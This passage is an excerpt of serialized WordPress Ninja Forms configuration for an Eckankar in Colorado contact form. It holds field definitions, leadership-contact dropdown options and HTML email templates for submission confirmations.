Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:13:\"element_class\";s:0:\"\";s:9:\"desc_text\";s:0:\"\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"show_desc\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:8:\"num_sort\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:17:\"calc_auto_include\";s:1:\"0\";s:21:\"user_info_field_group\";s:0:\"\";s:4:\"list\";a:0:{}s:15:\"list_show_value\";s:1:\"1\";s:10:\"multi_size\";s:1:\"5\";s:9:\"list_type\";s:8:\"dropdown\";s:9:\"label_pos\";s:5:\"above\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:5:\"label\";s:15:\"Your Local Area\";s:4:\"type\";s:10:\"listselect\";s:3:\"key\";s:13:\"listselect_25\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:13:\"listselect_25\";}s:2:\"id\";i:381;}i:6;a:2:{s:8:\"settings\";a:16:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"6\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:5:\"hr_26\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:5:\"hr_26\";}s:2:\"id\";i:382;}i:7;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"7\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:29:\"Colorado Leadership Positions\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:188:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:188:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Leadership Positions</span></span></span></strong></span></h3>\";s:3:\"key\";s:7:\"html_27\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:29:\"Colorado Leadership Positions\";s:9:\"field_key\";s:7:\"html_27\";}s:2:\"id\";i:383;}i:8;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"8\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:10:\"listselect\";s:5:\"label\";s:41:\"Select the person you would like to email\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:8:\"dropdown\";s:10:\"multi_size\";s:1:\"5\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"options\";a:5:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:19:\"ECK Temple Director\";s:5:\"value\";s:19:\"eck-temple-director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:24:\"ECK Temple Vahana Leader\";s:5:\"value\";s:24:\"ECK Temple Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Administrative Services\";s:5:\"value\";s:23:\"Administrative Services\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:13:\"listselect_28\";s:15:\"container_class\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:13:\"listselect_28\";}s:2:\"id\";i:384;}i:9;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:1:\"9\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:11:\"textarea_29\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:11:\"textarea_29\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:385;}i:10;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";s:2:\"11\";s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:9:\"submit_31\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:9:\"submit_31\";}s:2:\"id\";i:387;}}s:7:\"actions\";a:5:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-02-21 13:50:21\";s:5:\"label\";s:9:\"Save Form\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:161;}i:1;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-02-21 13:50:21\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_23}\";s:13:\"email_subject\";s:42:\"Central Colorado Leadership Communications\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:13:\"email_message\";s:6729:\"  <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">              <tbody>                <tr>                  <td style=\"padding: 20px 0px; background: white none repeat scroll 0% 0%; font-size: 50px; line-height: 10px; font-weight: 600;\" align=\"center\"><span style=\"color: #4f759b;\"><img src=\"file:///D:/ECK%20WEBSITE/ECK%20COLORADO%20WORDPRESS/ECK%20WEBSITE%20WITH%20BOLDGRID--CURRENT%20WEBSITE/images/email%20images/email-img-registration-600-5b.png\" alt=\"\"><br>                    </span><span style=\"color: #666666;\"><br>                    </span></td>                </tr>                <tr>                  <td style=\"padding:36px 30px 42px 30px;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                      <tbody>                        <tr>                          <td style=\"padding:0 0 36px 0;color:#153643;\">                            <div style=\"text-align: center;\"><span id=\"nf-drawer-content\"><span class=\"nf-setting-groups\"><span class=\"nf-field-settings\">                                    <p style=\"font-size:23px;\"><strong>Hello                                        {field:textbox_142},</strong></p>                                    <p style=\"font-size:19px;\">Thanks for                                      getting in touch!</p>                                    <p>You have created a new form submission on                                      the Eckankar In Colorado website                                      requesting contact with a person on the                                      Loveland ECK Leadership Communications                                      team.</p>                                    <p>Here is a copy of the information that                                      you have submitted:</p>                                  </span></span></span><strong><strong></strong>                              </strong></div>                            <strong> </strong></td>                        </tr>                        <tr>                          <td style=\"padding:0;\">                            <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;\">                              <tbody>                                <tr>                                  <td style=\"width:260px;padding:0;vertical-align:top;color:#153643;\">                                    <table id=\"emailHeader\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\" border=\"0\">                                      <tbody>                                        <tr>                                          <td style=\"background-color: #efefef;padding: 10px;border: 1px solid #cccccc\" valign=\"top\" align=\"left; \">                                            <p><span style=\"color: #333333\"><strong>FIRST                                                  NAME:</strong>                                                {field:textbox_142}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>LAST                                                  NAME:</strong>                                                {field:lastname_143}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>EMAIL:</strong>                                                {field:email_144}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong>                                                {field:phone_145}</span><br>                                              <br>                                              <span style=\"color: #333333\"><strong>LOCAL                                                  AREA:</strong>                                                {field:listselect_146}<br>                                                <br>                                              </span><span style=\"color: #333333\"><strong>PERSON                                                  YOU WOULD LIKE TO CONTACT:</strong>{field:select_the_person_you_would_like_to_contact_1613166666321}</span></p>                                            <p><span style=\"color: #333333\"><strong>MESSAGE:                                                  </strong>{field:textarea_150}</span></p>                                          </td>                                        </tr>                                      </tbody>                                    </table>                                  </td>                                </tr>                              </tbody>                            </table>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>                <tr>                  <td style=\"padding:30px;background:#7393B3;\">                    <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;font-size:9px;font-family:Arial,sans-serif;\">                      <tbody>                        <tr>                          <td style=\"padding:0;\" align=\"center\">                            <p style=\"margin:0;font-size:16px;line-height:22px;font-family:Arial,sans-serif;color:#ffffff;\">If                              you have any questions regarding the origin of                              this form, please feel free to contact the                              Eckankar In Colorado webmaster: <br>                              webmaster@eckankar-colorado.org<br>                              <br>                              <em>Your Eckankar in Colorado Team<br>                                <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em><a href=\"http://www.example.com\" style=\"color:#ffffff;text-decoration:underline;\"></a>                            </p>                          </td>                        </tr>                      </tbody>                    </table>                  </td>                </tr>              </tbody>            </table>          </td>        </tr>      </tbody>    </table>\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:162;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"0\";s:10:\"created_at\";s:19:\"2021-02-21 13:50:21\";s:5:\"label\";s:15:\"Success Message\";s:16:\"subs_expire_time\";s:2:\"90\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:11:\"<p><br></p>\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:163;}i:3;a:2:{s:8:\"settings\";a:29:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2021-02-21 13:50:21\";s:5:\"label\";s:11:\"Admin Email\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:42:\"Central Colorado Leadership Communications\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:31:\"webmaster@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:14:\"drawerDisabled\";b:0;s:13:\"email_message\";s:7199:\" <style>    table, td, div, h1, p {font-family: Arial, sans-serif;}  </style>        <table role=\"presentation\" style=\"width:100%;border-collapse:collapse;border:0;border-spacing:0;background:#ffffff;\">      <tbody>        <tr>          <td style=\"padding:0;\" align=\"center\">            <table role=\"presentation\" style=\"width:602px;border-collapse:collapse;border:1px solid #cccccc;border-spacing:0;text-align:left;\">              